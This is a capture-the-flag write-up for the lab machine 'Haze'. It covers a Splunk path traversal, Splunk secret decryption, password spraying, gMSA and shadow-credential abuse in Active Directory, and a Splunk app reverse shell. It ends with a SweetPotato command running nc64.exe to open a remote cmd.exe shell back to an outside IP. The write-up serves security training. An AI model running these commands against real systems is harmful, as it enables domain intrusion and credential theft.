# Haze

# 1. Enumeration

Start port enumeration

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image.png)

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%201.png)

Splunk web service is running on port 8000, a login form is displayed but we don’t have any credentials yet

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%202.png)

# 2. User flag

Search the internet to identify vulnerabilities like CVE-2024-36991. Arbitrary file read through reverse path traversal, this is possible thanks to `os.path.join` which concatenates the whole path ignoring any part of the string that includes a drive letter (`c:` in this case) 

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%203.png)

The next payload will be processed by the function and it will take the first `C:` probably located in the backend and it will ignore any other `C:` references treating the next as part of the path, in this way, path traversal filtering will be bypassed disclosing files outside the current directory

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%204.png)

Check `/etc/passwd` to confirm this environment is vulnerable, some hashes were found but they are not easy crackeable

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%205.png)

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%206.png)

Chat-gpt helps us to locate interesting taking advantage of splunk

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%207.png)

The secret is disclosed, now we need hashes to crack with this secret

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%208.png)

In the configuration files we will discover some hashes

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%209.png)

However, only in the authentication file does a hash have a Common Name

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2010.png)

Use `splunksecrets` tool to decrypt the hash found using the secret disclosed

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2011.png)

Make sure that this password is valid on ldap authentication

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2012.png)

It’s time to enumerate user in the domain

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2013.png)

Use those users to spray the password

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2014.png)

`mark.adams` is also using the same password, we can check if there are any useful share to obtain more information but this step did not succeed

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2015.png)

Those credentials might be convenient for enumerating the entire domain using `bloodhound-python`

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2016.png)

`Mark.adams` account is member of `GMSA_MANAGERS` group

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2017.png)

We can confirm that using Powershell

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2018.png)

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2019.png)

Attackers can abuse misconfigured gMSA to escalate privileges. This group (Group Managed Service Account) are assigned to automate password rotation but  only specific accounts should have `readgMSApassword` privilege, in this scenario we have compromised a gMSA manager’s member.

Bloodhound did not display members of gMSA. To enumerate users in the domain and identify which accounts can retrieve gMSA passwords or modify its properties, we can execute the following commands:

```python
Get-ADServiceAccount -Filter *
Get-ADServiceAcount Haze-IT-Backup -Property PrincipalsAllowedToRetrieveManagedPassword
#Who can modify this property?
$backupuser = Get-ADServiceAccount Haze-IT-Backup
(Get-Acl "AD:\$($backupuser.DistinguishedName)").Access | Where-Object {$_.IdentityReference -like '*gMSA_Manage'}
```

Other options to shortcut this enumeration could be:

- `get writeables` in `bloodyAD`
- Find-`InterestingDomainAcl` in `PowerView.ps1` module

Once we know gMSA managers can set Haze-IT-Backup property to retrieve its managed password we proceed to abuse this

```python
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
```

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2020.png)

This misconfiguration can be leverage to obtain the NTLM hash of the backup account

```python
nxc ldap ip -u user -p password --gmsa
```

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2021.png)

Haze-IT-Backup has WriteOwner permissions over support_services group, but seems to be something else to investigate

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2022.png)

Execute the `bloodhound-python` collector again, this time using backup user’s credentials

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2023.png)

Now the path forward is clearer

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2024.png)

Set `haze-it-backup` as the new owner of `support_services` and grant it `full-control` over the group

```python
impacker-owneredit -action write -new-owner 'new-owner' -target-dn 'target-dn' 'domain'/'user' -no-pass -hashes :hash
impacket-dacledit -action write -rights FullControl -principal 'attacker' -target-dn 'target-dn' 'domain'/'user' -no-pass -hashes :hash
#Or without imapcket 
pth-net rpc group addmem "SUPPORT_SERVICE" attackeruser -U 'domain'/'attacker'%'fffto_supply_right_format':'hash' -S ip
```

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2025.png)

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2026.png)

We have three options right now:

- Change edward.martin password’s (Faster but not a clean OPSEC, and not allowed in this machine)
- Request a TGT again and use certipy shadow credential to obtain edward hash (Automated and faster)
- Using pywhisker → gettgtpkinit → getnthash (A manual and more granular approach)

```python
#To update msDS-KeyCredentialLink and obtain a PFX from this link
python3 pywhisker.py -u 'attacker' -H :hash -d domain -t 'target' -a add
```

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2027.png)

```python
#Get a tgt using the PFX file generated previously
python gettgtpkinit -cert-pfx .pxf -pfx-pass pfxpass -dc-ip ip domain/target target.ccfile
```

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2028.png)

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2029.png)

```python
#Get a NT hash using that tgt
python getnthash.py -dc-ip ip -key key domain/target
```

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2030.png)

We can spawn a `edward.martin` shell using `evil-winrm` to obtain the user flag

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2031.png)

# 3.Priv esc

Check the splunk directories until you locate a backup

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2032.png)

Another version of the files we have abused early was in there with different hash and different secret

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2033.png)

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2034.png)

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2035.png)

Crack the hash we found

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2036.png)

It is supposed `alexander.green` credentials

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2037.png)

Log in with that password in the main web application service as the admin user 

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2038.png)

From here, it is straightforward, find how to exploit a reverse shell in splunk 

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2039.png)

Set ip and port in `run.ps1` as we are dealing with a Windows machine 

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2040.png)

Follow the instructions in the repository. Compress those files

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2041.png)

Then, upload them as an app installation in splunk

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2042.png)

It is successfully installed, we only need to enable it to trigger the reverse shell

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2043.png)

After obtaining a shell, enumerating Alexander’s privileges we discovered `SeImpersonatePriviele` 

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2044.png)

This privilege allow us to use a process to impersonate another user, `SweetPotato` pr `godpotato` are recommended tools for this task

```python
.\SweetPotato.exe -a 'type c:\users\administrator\desktop\root.txt'
#Or upload a nc.exe file and execute
.\SweetPotato.exe -a "C:\programdata\nc64.exe 10.10.14.6 444 -e cmd.exe"
```

![image.png](Haze%2020ab95255291800cbc49ec5d5b59132a/image%2045.png)

Machine pwned@!@@!@